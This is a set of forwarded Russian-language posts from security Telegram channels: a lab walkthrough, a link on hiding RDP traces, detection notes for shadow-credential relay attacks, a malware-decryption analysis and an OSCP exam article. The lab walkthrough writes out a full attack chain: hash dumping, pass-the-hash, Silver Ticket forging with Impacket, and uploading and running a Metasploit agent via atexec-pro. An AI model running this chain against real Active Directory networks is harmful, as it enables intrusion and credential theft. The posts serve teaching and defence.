Forwarded from #memekatz
This media is not supported in your browser
VIEW IN TELEGRAM
Когда спрашивают про отчет по пентесту
😁1
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Попался интересный материал про RDP. В блоге про то, какие следы можно найти после использования RDP, и как эти следы не оставлять
https://blog.devolutions.net/2025/03/using-rdp-without-leaving-traces-the-mstsc-public-mode/
P.S. пока сильно не вникал, оставил как заметку📝
#ad #pentest #redteam #bypass #lateralmovement
https://blog.devolutions.net/2025/03/using-rdp-without-leaving-traces-the-mstsc-public-mode/
P.S. пока сильно не вникал, оставил как заметку
#ad #pentest #redteam #bypass #lateralmovement
Please open Telegram to view this post
VIEW IN TELEGRAM
Devolutions
Using RDP without leaving traces: the MSTSC public mode
Learn how MSTSC’s /public mode works! It blocks credential caching, session details, and bitmap storage, enhancing security. Discover its impact and how to reset MSTSC for a clean slate.
Forwarded from Purple Chronicles (Feyd-Rautha Harkonnen)
В ходе решения одной из сетей на известной платформе может сложиться ситуация, с которой столкнулся я.
Имея привилегированный доступ к серверу, который впоследствии будет использоваться для Remote NTLM Relay, я без задней мысли отключил службы
NetLogon, LanManServer и LanManWorkstation и перезагрузил машину, забыв закрепиться на ней встроенными средствами фрэймворка постэксплуатации.Сделал я это следующим образом:
sc stop netlogon
sc stop lanmanserver
sc config lanmanserver start= disabled
sc stop lanmanworkstation
sc config lanmanworkstation start= disabled
После перезагрузки хоста я удостоверился, что порт 445 не прослушивается сервером (
nmap -p 445 -sT -Pn <serverIP>), после чего решил продолжить атаку, но столкнулся с очевидной проблемой: я не могу пройти аутентификацию на сервере и, следовательно, запустить бинарный файл, необходимый для организации портфорвардинга.Имеем 2 проблемы:
1) Не работают службы
NetLogon, LanManServer и LanManWorkstation, из-за чего не получится пройти аутентификацию на целевом сервере при помощи NTLM;2) Не работает SMB-порт, необходимый для работы большинства утилит из набора Impacket.
Что же делать?
Решение довольно очевидное. Вместо NTLM можно использовать Kerberos, так как мы находимся в доменной инфраструктуре. Не зря же после получения системного доступа к атакуемому серверу мы дампили его LSA-секреты?
А вместо стандартных скриптов из набора Impacket можно использовать их "pro вариации", которые не требуют доступа к 445 порту целевого сервера.
Начнем атаку!
Шаг 1. Silver Ticket🎫
Первый шаг показан в демонстративных целях, чтобы видеть хэш пароля учетной записи атакуемого сервера. Напомню, что его мы получили ранее путем дампа LSA-секретов на самом сервере.
proxychains impacket-secretsdump holo.live/Administrator@10.201.126.30 -hashes :<redacted> -just-dc-user 'PC-FILESRV01$'
...
PC-FILESRV01$:1120:aad3b435b51404eeaad3b435b51404ee:e66f5cf1a026516d1d2220130d8d13c4
Для осуществления атаки нам необходим SID домена, который мы получим с использованием скрипта
impacket-lookupsid из набора Impacket (в данном случае используем технику Pass-the-Hash в отношении контроллера домена):proxychains impacket-lookupsid HOLO.LIVE/'PC-FILESRV01$'@10.201.126.30 -hashes :e66f5cf1a026516d1d2220130d8d13c4
Получаем SID домена: S-1-5-21-471847105-3603022926-1728018720
После получения SID начинаем крафтить Silver Ticket, чтобы получить привилегированный доступ к целевому серверу. Путь до полученного тикета записываем в переменную окружения
KRB5CCNAME:proxychains impacket-ticketer -nthash e66f5cf1a026516d1d2220130d8d13c4 -domain-sid S-1-5-21-471847105-3603022926-1728018720 -dc-ip 10.201.126.30 -domain holo.live -spn HOST/PC-FILESRV01.holo.live 'watamet'
export KRB5CCNAME=watamet.ccache
Шаг 2. ATExec Pro
После этого уже при помощи известного нам
atexec-pro.py и полученного билета получаем доступ к целевому серверу и запускаем наш C2-агент (для примера здесь используется MSF): proxychains python3 atexec-pro.py PC-FILESRV01.holo.live -k -no-pass -dc-ip 10.201.126.30
Внутри шелла:
ATShell (@PC-FILESRV01.holo.live)> upload /root/THM/Holo/binaries/msf_win_x64.exe C:\Windows\Tasks\msf.exe
ATShell (@PC-FILESRV01.holo.live)> C:\Windows\Tasks\msf.exe
Поэтапно те же действия можно видеть на приложенных скриншотах.
1) Получение SID домена при помощи
impacket-lookupsid;2) Создание Silvet Ticket при помощи
impacket-ticketer для привилегированного доступа к целевому хосту;3) Получение доступа к целевому хосту при помощи
atexec-pro.py с использованием ранее полученного билета (обращаю внимание на лог ProxyChains, где отсутствует коннект до 445 порта).Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from AP Security
#soc
Свежие индикаторы компрометации: NTLM Relay Attack
Текущая реализация атаки Shadow credentials во фреймворке Impacket, используемая, в частности, скриптом ntlmrelayx.py, содержит множество ошибок, оставляющих уникальные подписи на структурах данных NGC, записываемых злоумышленниками в LDAP-атрибут msDS-KeyCredentialLink. С помощью эвристики можно выявить большинство вредоносных ключей NGC, независимо от того, с помощью какого хакерского инструмента они были сгенерированы.
Свежие индикаторы компрометации: NTLM Relay Attack
Текущая реализация атаки Shadow credentials во фреймворке Impacket, используемая, в частности, скриптом ntlmrelayx.py, содержит множество ошибок, оставляющих уникальные подписи на структурах данных NGC, записываемых злоумышленниками в LDAP-атрибут msDS-KeyCredentialLink. С помощью эвристики можно выявить большинство вредоносных ключей NGC, независимо от того, с помощью какого хакерского инструмента они были сгенерированы.
DSInternals
Indicator of Compromise: NTLM Relay Attack with Shadow Credentials
Updated in January 2026 to reflect changes in the behavior of domain controllers regarding the CUSTOMKEYINFO_FLAGS_MFA_NOT_USED flag. TL;DR The current implementation of the shadow credentials attack in the Impacket framework, most notably used by the ntlmrelayx.py…
👍1
Forwarded from Пентестер на мотоцикле
common_security_issues_in_financially-orientated.pdf.pdf
8.6 MB
На практике часто приходится сталкиваться с тестированием платёжных систем. Данная методичка поможет пентестерам проводить более тщательный анализ безопасности таких систем. На проекте также воспользовался данным материалом.
▎Краткое содержание:
Документ переведён на русский язык, но оригинал на английском также сохранён. Когда встретится кривой перевод, всегда можно свериться с оригинальным текстом страницей выше.
Сохраняйте себе, чтобы не потерять!
#материал
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from ESCalator
Используете ли вы криптографию правильно? 🔓
Группе исследования сложных угроз департамента Threat Intelligence часто приходится решать интересные задачи в процессе реверса ВПО. Этот раз не стал исключением. Существует такая техника, как Execution Guardrails: Environmental Keying, — она нужна для ограничения выполнения ВПО только в конкретной целевой среде. Например, ее использует группировка Decoy Dog в своих операциях.
В попавшем к нам на исследование семпле применялась эта же техника: в качестве ключа для используемых строк использовалось имя компьютера, которого у нас не было, дополнительно семпл был обфусцирован. В случае, если ВПО запускалось не на нужном злоумышленнику устройстве, оно крашилось — отсюда и стартует наше исследование.
☠️ Выяснилось, что ВПО «падает» при попытке вызова функции
Чтобы вычислить промежуточный ключ (который формируется в результате логических операций), мы прибегнули к атаке на основе открытого текста. Возвращаясь к функции
Группа исследования сложных угроз рекомендует одну из платформ для изучения криптоанализа — cryptohack.org.
#tips #reverse #malware #cryptography #TI
@ptescalator
Группе исследования сложных угроз департамента Threat Intelligence часто приходится решать интересные задачи в процессе реверса ВПО. Этот раз не стал исключением. Существует такая техника, как Execution Guardrails: Environmental Keying, — она нужна для ограничения выполнения ВПО только в конкретной целевой среде. Например, ее использует группировка Decoy Dog в своих операциях.
В попавшем к нам на исследование семпле применялась эта же техника: в качестве ключа для используемых строк использовалось имя компьютера, которого у нас не было, дополнительно семпл был обфусцирован. В случае, если ВПО запускалось не на нужном злоумышленнику устройстве, оно крашилось — отсюда и стартует наше исследование.
LoadLibraryA с переданным именем библиотеки в качестве неотображаемых байтов. Этот набор байтов должен представлять собой имя библиотеки, которая расшифровывается в цикле; при каждой итерации берется символ от имени компьютера, с помощью логических операций приводится в необратимый вид, а после уже гаммируется с зашифрованным текстом и его однобайтовой константой. Чтобы вычислить промежуточный ключ (который формируется в результате логических операций), мы прибегнули к атаке на основе открытого текста. Возвращаясь к функции
LoadLibraryA: мы знаем, что имя библиотеки будет составлять 13 байт в кодировке ASCII + '\x00'; так мы смогли восстановить треть ключа, а далее по аналогии уже с другими строками восстановили оставшуюся часть ключа.Дешифрование строки:
F(sym_comp_name) ^ sym_enc ^ cnst_enc = sym_dec
F(sym_comp_name) — логические операции
Получение промежуточного ключа:
sym_dll_name ^ sym_enc ^ cnst_enc = irr_sym_key
irr_sym_key — промежуточный байт ключа, необратимый
Группа исследования сложных угроз рекомендует одну из платформ для изучения криптоанализа — cryptohack.org.
#tips #reverse #malware #cryptography #TI
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Pentester's Backlog
🦾 Обещанная статья на тему сдачи OSCP+ в 2025 году.
Что ждать на экзамене, как сейчас готовиться, что творится вообще!?
😼 Всё это я постарался ёмко описать в данном материале
🔗 Ссылка на статью в telegra.ph
Что ждать на экзамене, как сейчас готовиться, что творится вообще!?
😼 Всё это я постарался ёмко описать в данном материале
🔗 Ссылка на статью в telegra.ph
Telegraph
OSCP (PEN-200) - ГЛАЗА НЕ БОЯТСЯ, И РУКИ ДЕЛАЮТ!
Привет! Обещанная статья про сдачу OSCP не заставила себя долго ждать. Для многих (как и для меня) этот экзаменом является неким milestone на пути обучения пентесту, явно указывающим коллегам по цеху на то, что ты что-то знаешь, что-то умеешь, но до уровня…